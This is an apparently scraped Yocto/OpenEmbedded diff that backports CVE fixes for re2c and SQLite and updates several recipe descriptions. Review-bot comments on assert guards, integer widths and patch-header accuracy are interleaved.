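++ else if (re->type == RE::CAT) {
++ if (i.succ == 0) {
++ // recurse into the left sub-RE
++ StackItem k = {re, 1};
++ stack.push_back(k);
++ StackItem j = {re->cat.re1, 0};
++ stack.push_back(j);
++ }
++ else if (null) {
++ // if the left sub-RE is not nullable, neither is concatenation,
++ // so stop recursion; otherwise recurse into the right sub-RE
++ StackItem j = {re->cat.re2, 0};
++ stack.push_back(j);
++ }
++ }
++ else if (re->type == RE::ITER) {
++ // iteration is nullable if the sub-RE is nullable
++ // (zero repetitions is represented with alternative)
++ StackItem j = {re->iter.re, 0};
++ stack.push_back(j);
++ }
++ }
++
++ //DASSERT(stack.empty());
++ return null;
++ }
++
++ } // anonymous namespace
++
++// Warn about rules that match empty string (including rules with nonempty
++// trailing context). False positives on partially self-shadowed rules like [^]?
++ void warn_nullable(const RESpec &spec, const std::string &cond)
++ {
++ std::vector<StackItem> stack;
++ const size_t nre = spec.res.size();
++ for (size_t i = 0; i < nre; ++i) {
++ if (nullable(spec, stack, spec.res[i])) {
++ spec.warn.match_empty_string(spec.rules[i].code->fline, cond);
++ }
++ }
++ }
+
+ } // namespace re2c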
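Review bot: In the `if (trailing(spec.tags[re->tag.idx]))` branch of the new `nullable()`, `stack.pop_back()` runs while its only guard, `//DASSERT(stack.size() == 1 && stack.back().re->type == RE::CAT);`, is commented out, so an empty stack at that point is undefined behaviour. The vector is also shared across rules by `warn_nullable()`, so if more than one item were left at the `break`, the stale items would be processed during the next rule's traversal and could overwrite its result. Replacing the pop with `stack.clear();` before the `break` is equivalent when the documented invariant holds and safe when it does not; alternatively restore the check as a plain `assert`. Whether the invariant always holds depends on how trailing-context REs are built, which is not visible in this patch.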
diff --git a/meta/recipes-support/re2c/re2c/CVE-2018-21232-4.patch b/meta/recipes-support/re2c/re2c/CVE-2018-21232-4.patch
new file mode 100644
index 0000000000..ee8d84b1bc
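--- /dev/null
+++ b/meta/recipes-support/re2c/re2c/CVE-2018-21232-4.patch
@@ -0,0 +1,166 @@
+From 89be91f3df00657261870adbc590209fdb2bc405 Mon Sep 17 00:00:00 2001
+From: Ulya Trofimovich <skvadrik@gmail.com>
+Date: Thu, 23 Apr 2020 23:02:21 +0100
+Subject: [PATCH] Rewrite recursion into iteration (estimation of NFA size for
+ RE).
+
+This is to avoid stack overflow on large RE (especially on instrumented
+builds that have larger stack frames, like AddressSanitizer).
+
+Partial fix for #219 "overflow-1.re test fails on system with small stack".
+
+Upstram-Status: Backport:
+https://github.com/skvadrik/re2c/commit/89be91f3df00657261870adbc590209fdb2bc405
+
+CVE: CVE-2018-21232
+
+Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com>
+---
+diff --git a/src/nfa/estimate_size.cc b/src/nfa/estimate_size.cc
+--- a/src/nfa/estimate_size.cc (revision e58939b34bb4c37cd990f82dc286f21cb405743e)
++++ b/src/nfa/estimate_size.cc (date 1647005399735)
+@@ -6,41 +6,113 @@
+ #include "src/re/re.h"
+
+ namespace re2c {
++namespace {
++
++struct StackItem {
++ const RE *re; // current sub-RE
++ uint32_t size; // size of the sub-RE (only for alternative and concatenation)
++ uint8_t succ; // index of the next sucessor to be visited
++};
+
+-static size_t estimate(const RE *re)
++static uint32_t estimate_re_size(const RE *re0, std::vector<StackItem> &stack)
+ {
+- switch (re->type) {
+- case RE::NIL: return 0;
+- case RE::SYM: return 1;
+- case RE::TAG: return 1;
+- case RE::ALT:
+- return estimate(re->alt.re1)
+- + estimate(re->alt.re2)
+- + 1;
+- case RE::CAT:
+- return estimate(re->cat.re1)
+- + estimate(re->cat.re2);
+- case RE::ITER: {
+- const size_t
+- iter = estimate(re->iter.re),
+- min = re->iter.min,
+- max = re->iter.max;
+- return max == AST::MANY
+- ? iter * min + 1
+- : iter * max + (max - min);
+- }
+- }
+- return 0; /* unreachable */
+-}
++ // the estimated size of the last sub-RE visited by DFS
++ uint32_t size = 0;
++
++ const StackItem i0 = {re0, 0, 0};
++ stack.push_back(i0);
++
++ while (!stack.empty()) {
++ const StackItem i = stack.back();
++ stack.pop_back();
++
++ const RE *re = i.re;
++ if (re->type == RE::NIL) {
++ size = 0;
++ }
++ else if (re->type == RE::SYM || re->type == RE::TAG) {
++ size = 1;
++ }
++ else if (re->type == RE::ALT) {
++ if (i.succ == 0) {
++ // recurse into the left sub-RE
++ StackItem k = {re, 0, 1};
++ stack.push_back(k);
++ StackItem j = {re->alt.re1, 0, 0};
++ stack.push_back(j);
++ }
++ else if (i.succ == 1) {
++ // recurse into the right sub-RE
++ StackItem k = {re, size, 2};
++ stack.push_back(k);
++ StackItem j = {re->alt.re2, 0, 0};
++ stack.push_back(j);
++ }
++ else {
++ // both sub-RE visited, recursive return
++ size = i.size // left sub-RE (saved on stack)
++ + size // right sub-RE (just visited by DFS)
++ + 1; // additional state for alternative
++ }
++ }
++ else if (re->type == RE::CAT) {
++ if (i.succ == 0) {
++ // recurse into the left sub-RE
++ StackItem k = {re, 0, 1};
++ stack.push_back(k);
++ StackItem j = {re->cat.re1, 0, 0};
++ stack.push_back(j);
++ }
++ else if (i.succ == 1) {
++ // recurse into the right sub-RE
++ StackItem k = {re, size, 2};
++ stack.push_back(k);
++ StackItem j = {re->cat.re2, 0, 0};
++ stack.push_back(j);
++ }
++ else {
++ // both sub-RE visited, recursive return
++ size = i.size // left sub-RE (saved on stack)
++ + size; // right sub-RE (just visited by DFS)
++ }
++ }
++ else if (re->type == RE::ITER) {
++ if (i.succ == 0) {
++ // recurse into the sub-RE
++ StackItem k = {re, 0, 1};
++ stack.push_back(k);
++ StackItem j = {re->iter.re, 0, 0};
++ stack.push_back(j);
++ }
++ else {
++ // sub-RE visited, recursive return
++ const uint32_t min = re->iter.min, max = re->iter.max;
++ size = max == AST::MANY
++ ? size * min + 1
++ : size * max + (max - min);
++ }
++ }
++ }
++
++ //DASSERT(stack.empty());
++ return size;
++}
++
++} // anonymous namespace
+
+ size_t estimate_size(const std::vector<RE*> &res)
+ {
+- const size_t nre = res.size();
+- size_t size = nre - 1;
+- for (size_t i = 0; i < nre; ++i) {
+- size += estimate(res[i]) + 1;
+- }
+- return size;
++ std::vector<StackItem> stack;
++
++ const size_t nre = res.size();
++ //DASSERT(nre > 0);
++ size_t size = nre - 1;
++
++ for (size_t i = 0; i < nre; ++i) {
++ size += estimate_re_size(res[i], stack) + 1;
++ }
++
++ return size;
+ }
+
+ } // namespace re2c
+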
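Review bot: `estimate_re_size()` accumulates in `uint32_t` where the removed `estimate()` used `size_t`, and the ITER return `size * min + 1` / `size * max + (max - min)` is unchecked, so a large repetition count over a large sub-RE wraps silently and yields a small estimate. How callers use the result is not visible here; if it sizes or bounds the NFA, computing the product in `uint64_t` and clamping to `UINT32_MAX` would keep the estimate conservative. `estimate_size()` likewise computes `nre - 1` with `//DASSERT(nre > 0);` commented out, so an empty `res` underflows. Separately, the header tag is spelled `Upstram-Status:`, which patch-status tooling will not recognise; it should read `Upstream-Status: Backport [https://github.com/skvadrik/re2c/commit/89be91f3df00657261870adbc590209fdb2bc405]`.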
diff --git a/meta/recipes-support/re2c/re2c_1.0.1.bb b/meta/recipes-support/re2c/re2c_1.0.1.bb
index 35200ecde8..ca5c33f151 100644
--- a/meta/recipes-support/re2c/re2c_1.0.1.bb
+++ b/meta/recipes-support/re2c/re2c_1.0.1.bb
@@ -1,11 +1,17 @@
1SUMMARY = "Tool for writing very fast and very flexible scanners" 1SUMMARY = "Tool for writing very fast and very flexible scanners"
2HOMEPAGE = "http://re2c.sourceforge.net/" 2DESCRIPTION = "A free and open-source lexer generator for C, C++ and Go. It compiles regular expressions to determinisitic finite automata and encodes the automata in the form of a program in the target language. Unlike any other such tool, re2c focuses on generating high efficient code for regular expression matching. As a result this allows a much broader range of use than any traditional lexer."
3HOMEPAGE = "http://re2c.org/"
4BUGTRACKER = "https://github.com/skvadrik/re2c/issues"
3AUTHOR = "Marcus Börger <helly@users.sourceforge.net>" 5AUTHOR = "Marcus Börger <helly@users.sourceforge.net>"
4SECTION = "devel" 6SECTION = "devel"
5LICENSE = "PD" 7LICENSE = "PD"
6LIC_FILES_CHKSUM = "file://README;beginline=146;md5=881056c9add17f8019ccd8c382ba963a" 8LIC_FILES_CHKSUM = "file://README;beginline=146;md5=881056c9add17f8019ccd8c382ba963a"
7 9
8SRC_URI = "https://github.com/skvadrik/re2c/releases/download/${PV}/${BPN}-${PV}.tar.gz" 10SRC_URI = "https://github.com/skvadrik/re2c/releases/download/${PV}/${BPN}-${PV}.tar.gz \
11file://CVE-2018-21232-1.patch \
12file://CVE-2018-21232-2.patch \
13file://CVE-2018-21232-3.patch \
14file://CVE-2018-21232-4.patch"
9SRC_URI[md5sum] = "e2c6cf52fc6a21595f21bc82db5324f8" 15SRC_URI[md5sum] = "e2c6cf52fc6a21595f21bc82db5324f8"
10SRC_URI[sha256sum] = "605058d18a00e01bfc32aebf83af35ed5b13180b4e9f279c90843afab2c66c7c" 16SRC_URI[sha256sum] = "605058d18a00e01bfc32aebf83af35ed5b13180b4e9f279c90843afab2c66c7c"
11UPSTREAM_CHECK_URI = "https://github.com/skvadrik/re2c/releases" 17UPSTREAM_CHECK_URI = "https://github.com/skvadrik/re2c/releases"
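Review bot: All four patches added to `SRC_URI` are named for CVE-2018-21232, and the two that are fully visible on this page each describe themselves as a "Partial fix for #219". CVE checking that keys on the `CVE:` tag in patch headers reports the issue as patched once any tagged patch is present. It would help to state in the commit message or the recipe whether this set covers every recursive pass upstream rewrote, and which are still missing if not. A comment above the list such as `# CVE-2018-21232: backport of upstream recursion-to-iteration series, parts 1-4` would make the intended coverage reviewable.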
diff --git a/meta/recipes-support/rng-tools/rng-tools/rngd.service b/meta/recipes-support/rng-tools/rng-tools/rngd.service
index aaaaa29074..f296a99e1f 100644
--- a/meta/recipes-support/rng-tools/rng-tools/rngd.service
+++ b/meta/recipes-support/rng-tools/rng-tools/rngd.service
@@ -3,6 +3,7 @@ Description=Hardware RNG Entropy Gatherer Daemon
3DefaultDependencies=no 3DefaultDependencies=no
4After=systemd-udev-settle.service 4After=systemd-udev-settle.service
5Before=sysinit.target shutdown.target 5Before=sysinit.target shutdown.target
6Wants=systemd-udev-settle.service
6Conflicts=shutdown.target 7Conflicts=shutdown.target
7 8
8[Service] 9[Service]
diff --git a/meta/recipes-support/rng-tools/rng-tools_6.9.bb b/meta/recipes-support/rng-tools/rng-tools_6.9.bb
index b8c6f022f3..58b58fbb3c 100644
--- a/meta/recipes-support/rng-tools/rng-tools_6.9.bb
+++ b/meta/recipes-support/rng-tools/rng-tools_6.9.bb
@@ -9,7 +9,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263"
9DEPENDS = "sysfsutils" 9DEPENDS = "sysfsutils"
10 10
11SRC_URI = "\ 11SRC_URI = "\
12 git://github.com/nhorman/rng-tools.git \ 12 git://github.com/nhorman/rng-tools.git;branch=master;protocol=https \
13 file://0001-rngd_jitter-fix-O_NONBLOCK-setting-for-entropy-pipe.patch \ 13 file://0001-rngd_jitter-fix-O_NONBLOCK-setting-for-entropy-pipe.patch \
14 file://0002-rngd_jitter-initialize-AES-key-before-setting-the-en.patch \ 14 file://0002-rngd_jitter-initialize-AES-key-before-setting-the-en.patch \
15 file://0003-rngd_jitter-always-read-from-entropy-pipe-before-set.patch \ 15 file://0003-rngd_jitter-always-read-from-entropy-pipe-before-set.patch \
diff --git a/meta/recipes-support/serf/serf_1.3.9.bb b/meta/recipes-support/serf/serf_1.3.9.bb
index 2fbf96f997..3276d40df6 100644
--- a/meta/recipes-support/serf/serf_1.3.9.bb
+++ b/meta/recipes-support/serf/serf_1.3.9.bb
@@ -1,4 +1,9 @@
1SUMMARY = "High-Performance Asynchronous HTTP Client Library" 1SUMMARY = "High-Performance Asynchronous HTTP Client Library"
2DESCRIPTION = "The Apache Serf library is a C-based HTTP client library built upon the Apache \
3Portable Runtime (APR) library. It multiplexes connections, running the \
4read/write communication asynchronously. Memory copies and transformations are \
5kept to a minimum to provide high performance operation."
6HOMEPAGE = "http://serf.apache.org/"
2SRC_URI = "${APACHE_MIRROR}/${BPN}/${BPN}-${PV}.tar.bz2 \ 7SRC_URI = "${APACHE_MIRROR}/${BPN}/${BPN}-${PV}.tar.bz2 \
3 file://norpath.patch \ 8 file://norpath.patch \
4 file://env.patch \ 9 file://env.patch \
diff --git a/meta/recipes-support/shared-mime-info/shared-mime-info_git.bb b/meta/recipes-support/shared-mime-info/shared-mime-info_git.bb
index 7a060b09ad..05c7d32965 100644
--- a/meta/recipes-support/shared-mime-info/shared-mime-info_git.bb
+++ b/meta/recipes-support/shared-mime-info/shared-mime-info_git.bb
@@ -1,4 +1,5 @@
1SUMMARY = "Shared MIME type database and specification" 1SUMMARY = "Shared MIME type database and specification"
2DESCRIPTION = "The shared-mime-info package contains the core database of common types and the update-mime-database command used to extend it. It requires glib2 to be installed for building the update command. Additionally, it uses intltool for translations, though this is only a dependency for the maintainers."
2HOMEPAGE = "http://freedesktop.org/wiki/Software/shared-mime-info" 3HOMEPAGE = "http://freedesktop.org/wiki/Software/shared-mime-info"
3SECTION = "base" 4SECTION = "base"
4 5
@@ -7,7 +8,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263"
7 8
8DEPENDS = "libxml2 itstool-native glib-2.0 shared-mime-info-native" 9DEPENDS = "libxml2 itstool-native glib-2.0 shared-mime-info-native"
9 10
10SRC_URI = "git://gitlab.freedesktop.org/xdg/shared-mime-info.git;protocol=https" 11SRC_URI = "git://gitlab.freedesktop.org/xdg/shared-mime-info.git;protocol=https;branch=master"
11SRCREV = "829b26d85e7d89a0caee03046c3bce373f04c80a" 12SRCREV = "829b26d85e7d89a0caee03046c3bce373f04c80a"
12PV = "1.15" 13PV = "1.15"
13S = "${WORKDIR}/git" 14S = "${WORKDIR}/git"
diff --git a/meta/recipes-support/sqlite/files/CVE-2020-35525.patch b/meta/recipes-support/sqlite/files/CVE-2020-35525.patch
new file mode 100644
index 0000000000..27d81d42d9
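--- /dev/null
+++ b/meta/recipes-support/sqlite/files/CVE-2020-35525.patch
@@ -0,0 +1,21 @@
+From: drh <drh@noemail.net>
+Date: Thu, 20 Feb 2020 14:08:51 +0000
+Subject: [PATCH] Early-out on the INTERSECT query processing following an
+ error.
+
+Upstream-Status: Backport [http://security.debian.org/debian-security/pool/updates/main/s/sqlite3/sqlite3_3.27.2-3+deb10u2.debian.tar.xz]
+CVE: CVE-2020-35525
+Signed-off-by: Virendra Thakur <virendrak@kpit.com>
+---
+Index: sqlite-autoconf-3310100/sqlite3.c
+===================================================================
+--- sqlite-autoconf-3310100.orig/sqlite3.c
++++ sqlite-autoconf-3310100/sqlite3.c
+@@ -130767,6 +130767,7 @@ static int multiSelect(
+ /* Generate code to take the intersection of the two temporary
+ ** tables.
+ */
++ if( rc ) break;
+ assert( p->pEList );
+ iBreak = sqlite3VdbeMakeLabel(pParse);
+ iCont = sqlite3VdbeMakeLabel(pParse);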
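Review bot: The `Upstream-Status:` line points at a Debian security tarball served over plain `http://` rather than at the SQLite check-in, and the header carries no upstream commit id, so the one-line change `if( rc ) break;` cannot be matched against upstream from this file alone; CVE-2020-35527.patch has the same kind of header. Adding the upstream reference alongside the Debian one, e.g. `Upstream-Status: Backport [<upstream SQLite check-in URL>]`, would let a reviewer verify the backport. `multiSelect()` starts and ends outside the hunk, so whether the early `break` skips cleanup that the INTERSECT branch needs cannot be judged here.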
diff --git a/meta/recipes-support/sqlite/files/CVE-2020-35527.patch b/meta/recipes-support/sqlite/files/CVE-2020-35527.patch
new file mode 100644
index 0000000000..d1dae389b0
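--- /dev/null
+++ b/meta/recipes-support/sqlite/files/CVE-2020-35527.patch
@@ -0,0 +1,22 @@
+From: dan <dan@noemail.net>
+Date: Mon, 26 Oct 2020 13:24:36 +0000
+Subject: [PATCH] Fix a problem with ALTER TABLE for views that have a nested
+ FROM clause. Ticket [f50af3e8a565776b].
+
+Upstream-Status: Backport [http://security.debian.org/debian-security/pool/updates/main/s/sqlite3/sqlite3_3.27.2-3+deb10u2.debian.tar.xz]
+CVE: CVE-2020-35527
+Signed-off-by: Virendra Thakur <virendra.thakur@kpit.com>
+---
+Index: sqlite-autoconf-3310100/sqlite3.c
+===================================================================
+--- sqlite-autoconf-3310100.orig/sqlite3.c
++++ sqlite-autoconf-3310100/sqlite3.c
+@@ -133110,7 +133110,7 @@ static int selectExpander(Walker *pWalke
+ pNew = sqlite3ExprListAppend(pParse, pNew, pExpr);
+ sqlite3TokenInit(&sColname, zColname);
+ sqlite3ExprListSetName(pParse, pNew, &sColname, 0);
+- if( pNew && (p->selFlags & SF_NestedFrom)!=0 ){
++ if( pNew && (p->selFlags & SF_NestedFrom)!=0 && !IN_RENAME_OBJECT ){
+ struct ExprList_item *pX = &pNew->a[pNew->nExpr-1];
+ sqlite3DbFree(db, pX->zEName);
+ if( pSub ){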
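Review bot: The `Date: Mon, 26 Oct 2020 13:24:36 +0000` header here is identical to the second with the one in CVE-2021-20223.patch, which describes an unrelated fts5 tokenizer change by the same author, so one of the two headers was probably copied from the other. Since neither this file nor its `Upstream-Status:` line names an upstream check-in, the date is one of the few things a reviewer can use to locate the original change for ticket `f50af3e8a565776b`. It should be corrected to the real check-in date, and the check-in id added to the header. `selectExpander()` continues outside the hunk.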
diff --git a/meta/recipes-support/sqlite/files/CVE-2021-20223.patch b/meta/recipes-support/sqlite/files/CVE-2021-20223.patch
new file mode 100644
index 0000000000..e9d2e04d30
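--- /dev/null
+++ b/meta/recipes-support/sqlite/files/CVE-2021-20223.patch
@@ -0,0 +1,23 @@
+From d1d43efa4fb0f2098c0e2c5bf2e807c58d5ec05b Mon Sep 17 00:00:00 2001
+From: dan <dan@noemail.net>
+Date: Mon, 26 Oct 2020 13:24:36 +0000
+Subject: [PATCH] Prevent fts5 tokenizer unicode61 from considering '\0' to be
+ a token characters, even if other characters of class "Cc" are.
+
+FossilOrigin-Name: b7b7bde9b7a03665e3691c6d51118965f216d2dfb1617f138b9f9e60e418ed2f
+
+CVE: CVE-2021-20223
+Upstream-Status: Backport [https://github.com/sqlite/sqlite/commit/d1d43efa4fb0f2098c0e2c5bf2e807c58d5ec05b.patch]
+Comment: Removed manifest, manifest.uuid and fts5tok1.test as these files are not present in the amalgamated source code
+Signed-Off-by: Sana.Kazi@kpit.com
+---
+--- a/sqlite3.c 2022-09-09 13:54:30.010768197 +0530
++++ b/sqlite3.c 2022-09-09 13:56:25.458769142 +0530
+@@ -227114,6 +227114,7 @@
+ }
+ iTbl++;
+ }
++ aAscii[0] = 0; /* 0x00 is never a token character */
+ }
+
+ /*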
diff --git a/meta/recipes-support/sqlite/files/CVE-2022-35737.patch b/meta/recipes-support/sqlite/files/CVE-2022-35737.patch
new file mode 100644
index 0000000000..341e002913
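--- /dev/null
+++ b/meta/recipes-support/sqlite/files/CVE-2022-35737.patch
@@ -0,0 +1,29 @@
+From 2bbf4c999dbb4b520561a57e0bafc19a15562093 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Fri, 2 Sep 2022 11:22:29 +0530
+Subject: [PATCH] CVE-2022-35737
+
+Upstream-Status: Backport [https://www.sqlite.org/src/info/aab790a16e1bdff7]
+CVE: CVE-2022-35737
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ sqlite3.c | 3 ++-
+ 1 file changed, 2 insertions(+), 1 deletion(-)
+
+diff --git a/sqlite3.c b/sqlite3.c
+index f664217..33dfb78 100644
+--- a/sqlite3.c
++++ b/sqlite3.c
+@@ -28758,7 +28758,8 @@ SQLITE_API void sqlite3_str_vappendf(
+ case etSQLESCAPE: /* %q: Escape ' characters */
+ case etSQLESCAPE2: /* %Q: Escape ' and enclose in '...' */
+ case etSQLESCAPE3: { /* %w: Escape " characters */
+- int i, j, k, n, isnull;
++ i64 i, j, k, n;
++ int isnull;
+ int needQuote;
+ char ch;
+ char q = ((xtype==etSQLESCAPE3)?'"':'\''); /* Quote character */
+--
+2.25.1
+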
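Review bot: The hunk widens only the declarations (`i64 i, j, k, n;`), while the code that consumes `n` to size the escape buffer lies further down in `sqlite3_str_vappendf()`, outside the hunk. It is worth confirming against the 3.31.1 amalgamation that none of those uses passes the value through an `int` parameter or cast, since that would truncate it again and leave the overflow in place on this older base. The subject line is only the CVE id; a one-line description of the defect, as far as the hunk shows it (`int` counters in the `%q`/`%Q`/`%w` escape path), would help later audits.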
diff --git a/meta/recipes-support/sqlite/files/CVE-2023-7104.patch b/meta/recipes-support/sqlite/files/CVE-2023-7104.patch
new file mode 100644
index 0000000000..01ff29ff5e
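--- /dev/null
+++ b/meta/recipes-support/sqlite/files/CVE-2023-7104.patch
@@ -0,0 +1,46 @@
+From eab426c5fba69d2c77023939f72b4ad446834e3c Mon Sep 17 00:00:00 2001
+From: dan <Dan Kennedy>
+Date: Thu, 7 Sep 2023 13:53:09 +0000
+Subject: [PATCH] Fix a buffer overread in the sessions extension that could occur when processing a corrupt changeset.
+
+Upstream-Status: Backport [https://sqlite.org/src/info/0e4e7a05c4204b47]
+CVE: CVE-2023-7104
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ sqlite3.c | 18 +++++++++++-------
+ 1 file changed, 11 insertions(+), 7 deletions(-)
+
+diff --git a/sqlite3.c b/sqlite3.c
+index 972ef18..c645ac8 100644
+--- a/sqlite3.c
++++ b/sqlite3.c
+@@ -203301,15 +203301,19 @@ static int sessionReadRecord(
+ }
+ }
+ if( eType==SQLITE_INTEGER || eType==SQLITE_FLOAT ){
+- sqlite3_int64 v = sessionGetI64(aVal);
+- if( eType==SQLITE_INTEGER ){
+- sqlite3VdbeMemSetInt64(apOut[i], v);
++ if( (pIn->nData-pIn->iNext)<8 ){
++ rc = SQLITE_CORRUPT_BKPT;
+ }else{
+- double d;
+- memcpy(&d, &v, 8);
+- sqlite3VdbeMemSetDouble(apOut[i], d);
++ sqlite3_int64 v = sessionGetI64(aVal);
++ if( eType==SQLITE_INTEGER ){
++ sqlite3VdbeMemSetInt64(apOut[i], v);
++ }else{
++ double d;
++ memcpy(&d, &v, 8);
++ sqlite3VdbeMemSetDouble(apOut[i], d);
++ }
++ pIn->iNext += 8;
+ }
+- pIn->iNext += 8;
+ }
+ }
+ }
+--
+2.25.1
+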
diff --git a/meta/recipes-support/sqlite/sqlite3.inc b/meta/recipes-support/sqlite/sqlite3.inc
index 07614bdb3e..1adc0eba66 100644
--- a/meta/recipes-support/sqlite/sqlite3.inc
+++ b/meta/recipes-support/sqlite/sqlite3.inc
@@ -1,4 +1,5 @@
1SUMMARY = "Embeddable SQL database engine" 1SUMMARY = "Embeddable SQL database engine"
2DESCRIPTION = "A library that implements a small, fast, self-contained, high-reliability, full-featured, SQL database engine. SQLite is the most used database engine in the world. SQLite is built into all mobile phones and most computers and comes bundled inside countless other applications that people use every day"
2HOMEPAGE = "http://www.sqlite.org" 3HOMEPAGE = "http://www.sqlite.org"
3SECTION = "libs" 4SECTION = "libs"
4 5
diff --git a/meta/recipes-support/sqlite/sqlite3_3.31.1.bb b/meta/recipes-support/sqlite/sqlite3_3.31.1.bb
index 877e80f5a3..0e7bcfa5a7 100644
--- a/meta/recipes-support/sqlite/sqlite3_3.31.1.bb
+++ b/meta/recipes-support/sqlite/sqlite3_3.31.1.bb
@@ -13,6 +13,11 @@ SRC_URI = "http://www.sqlite.org/2020/sqlite-autoconf-${SQLITE_PV}.tar.gz \
13 file://CVE-2020-13630.patch \ 13 file://CVE-2020-13630.patch \
14 file://CVE-2020-13631.patch \ 14 file://CVE-2020-13631.patch \
15 file://CVE-2020-13632.patch \ 15 file://CVE-2020-13632.patch \
16 file://CVE-2022-35737.patch \
17 file://CVE-2020-35525.patch \
18 file://CVE-2020-35527.patch \
19 file://CVE-2021-20223.patch \
20 file://CVE-2023-7104.patch \
16 " 21 "
17SRC_URI[md5sum] = "2d0a553534c521504e3ac3ad3b90f125" 22SRC_URI[md5sum] = "2d0a553534c521504e3ac3ad3b90f125"
18SRC_URI[sha256sum] = "62284efebc05a76f909c580ffa5c008a7d22a1287285d68b7825a2b6b51949ae" 23SRC_URI[sha256sum] = "62284efebc05a76f909c580ffa5c008a7d22a1287285d68b7825a2b6b51949ae"
diff --git a/meta/recipes-support/taglib/taglib_1.11.1.bb b/meta/recipes-support/taglib/taglib_1.11.1.bb
index f4e288295d..165bccadc1 100644
--- a/meta/recipes-support/taglib/taglib_1.11.1.bb
+++ b/meta/recipes-support/taglib/taglib_1.11.1.bb
@@ -1,4 +1,5 @@
1SUMMARY = "Library for reading and editing the meta-data of popular audio formats" 1SUMMARY = "Library for reading and editing the meta-data of popular audio formats"
2DESCRIPTION = "Platform-independent library (tested on Windows/Linux) for reading and writing metadata in media files, including video, audio, and photo formats. This is a convenient one-stop-shop to present or tag all your media collection, regardless of which format/container these might use. You can read/write the standard or more common tags/properties of a media, or you can also create and retrieve your own custom tags."
2SECTION = "libs/multimedia" 3SECTION = "libs/multimedia"
3HOMEPAGE = "http://taglib.github.io/" 4HOMEPAGE = "http://taglib.github.io/"
4LICENSE = "LGPLv2.1 | MPL-1.1" 5LICENSE = "LGPLv2.1 | MPL-1.1"
diff --git a/meta/recipes-support/vim/files/0001-src-Makefile-improve-reproducibility.patch b/meta/recipes-support/vim/files/0001-src-Makefile-improve-reproducibility.patch
index 63a7b78f12..2fc11dbdc2 100644
--- a/meta/recipes-support/vim/files/0001-src-Makefile-improve-reproducibility.patch
+++ b/meta/recipes-support/vim/files/0001-src-Makefile-improve-reproducibility.patch
@@ -16,11 +16,11 @@ Signed-off-by: Mingli Yu <mingli.yu@windriver.com>
16 src/Makefile | 14 ++++---------- 16 src/Makefile | 14 ++++----------
17 1 file changed, 4 insertions(+), 10 deletions(-) 17 1 file changed, 4 insertions(+), 10 deletions(-)
18 18
19diff --git a/src/Makefile b/src/Makefile 19Index: git/src/Makefile
20index f2fafa4dc..7148d4bd9 100644 20===================================================================
21--- a/src/Makefile 21--- git.orig/src/Makefile
22+++ b/src/Makefile 22+++ git/src/Makefile
23@@ -2845,16 +2845,10 @@ auto/pathdef.c: Makefile auto/config.mk 23@@ -3101,16 +3101,10 @@ auto/pathdef.c: Makefile auto/config.mk
24 -@echo '#include "vim.h"' >> $@ 24 -@echo '#include "vim.h"' >> $@
25 -@echo 'char_u *default_vim_dir = (char_u *)"$(VIMRCLOC)";' | $(QUOTESED) >> $@ 25 -@echo 'char_u *default_vim_dir = (char_u *)"$(VIMRCLOC)";' | $(QUOTESED) >> $@
26 -@echo 'char_u *default_vimruntime_dir = (char_u *)"$(VIMRUNTIMEDIR)";' | $(QUOTESED) >> $@ 26 -@echo 'char_u *default_vimruntime_dir = (char_u *)"$(VIMRUNTIMEDIR)";' | $(QUOTESED) >> $@
@@ -41,6 +41,3 @@ index f2fafa4dc..7148d4bd9 100644
41 -@sh $(srcdir)/pathdef.sh 41 -@sh $(srcdir)/pathdef.sh
42 42
43 GUI_GTK_RES_INPUTS = \ 43 GUI_GTK_RES_INPUTS = \
44--
452.17.1
46
diff --git a/meta/recipes-support/vim/files/disable_acl_header_check.patch b/meta/recipes-support/vim/files/disable_acl_header_check.patch
index 33089162b4..533138245d 100644
--- a/meta/recipes-support/vim/files/disable_acl_header_check.patch
+++ b/meta/recipes-support/vim/files/disable_acl_header_check.patch
@@ -13,11 +13,11 @@ Signed-off-by: Changqing Li <changqing.li@windriver.com>
13 src/configure.ac | 3 ++- 13 src/configure.ac | 3 ++-
14 1 file changed, 2 insertions(+), 1 deletion(-) 14 1 file changed, 2 insertions(+), 1 deletion(-)
15 15
16diff --git a/src/configure.ac b/src/configure.ac 16Index: git/src/configure.ac
17index 2d409b3ca06a..dbcaf6140263 100644 17===================================================================
18--- a/src/configure.ac 18--- git.orig/src/configure.ac
19+++ b/src/configure.ac 19+++ git/src/configure.ac
20@@ -3257,7 +3257,7 @@ AC_CHECK_HEADERS(stdint.h stdlib.h string.h \ 20@@ -3292,7 +3292,7 @@ AC_CHECK_HEADERS(stdint.h stdlib.h strin
21 sys/systeminfo.h locale.h sys/stream.h termios.h \ 21 sys/systeminfo.h locale.h sys/stream.h termios.h \
22 libc.h sys/statfs.h poll.h sys/poll.h pwd.h \ 22 libc.h sys/statfs.h poll.h sys/poll.h pwd.h \
23 utime.h sys/param.h sys/ptms.h libintl.h libgen.h \ 23 utime.h sys/param.h sys/ptms.h libintl.h libgen.h \
@@ -26,7 +26,7 @@ index 2d409b3ca06a..dbcaf6140263 100644
26 sys/access.h sys/sysinfo.h wchar.h wctype.h) 26 sys/access.h sys/sysinfo.h wchar.h wctype.h)
27 27
28 dnl sys/ptem.h depends on sys/stream.h on Solaris 28 dnl sys/ptem.h depends on sys/stream.h on Solaris
29@@ -3886,6 +3886,7 @@ AC_ARG_ENABLE(acl, 29@@ -3974,6 +3974,7 @@ AC_ARG_ENABLE(acl,
30 , [enable_acl="yes"]) 30 , [enable_acl="yes"])
31 if test "$enable_acl" = "yes"; then 31 if test "$enable_acl" = "yes"; then
32 AC_MSG_RESULT(no) 32 AC_MSG_RESULT(no)
@@ -34,6 +34,3 @@ index 2d409b3ca06a..dbcaf6140263 100644
34 AC_CHECK_LIB(posix1e, acl_get_file, [LIBS="$LIBS -lposix1e"], 34 AC_CHECK_LIB(posix1e, acl_get_file, [LIBS="$LIBS -lposix1e"],
35 AC_CHECK_LIB(acl, acl_get_file, [LIBS="$LIBS -lacl" 35 AC_CHECK_LIB(acl, acl_get_file, [LIBS="$LIBS -lacl"
36 AC_CHECK_LIB(attr, fgetxattr, LIBS="$LIBS -lattr",,)],,),) 36 AC_CHECK_LIB(attr, fgetxattr, LIBS="$LIBS -lattr",,)],,),)
37--
382.7.4
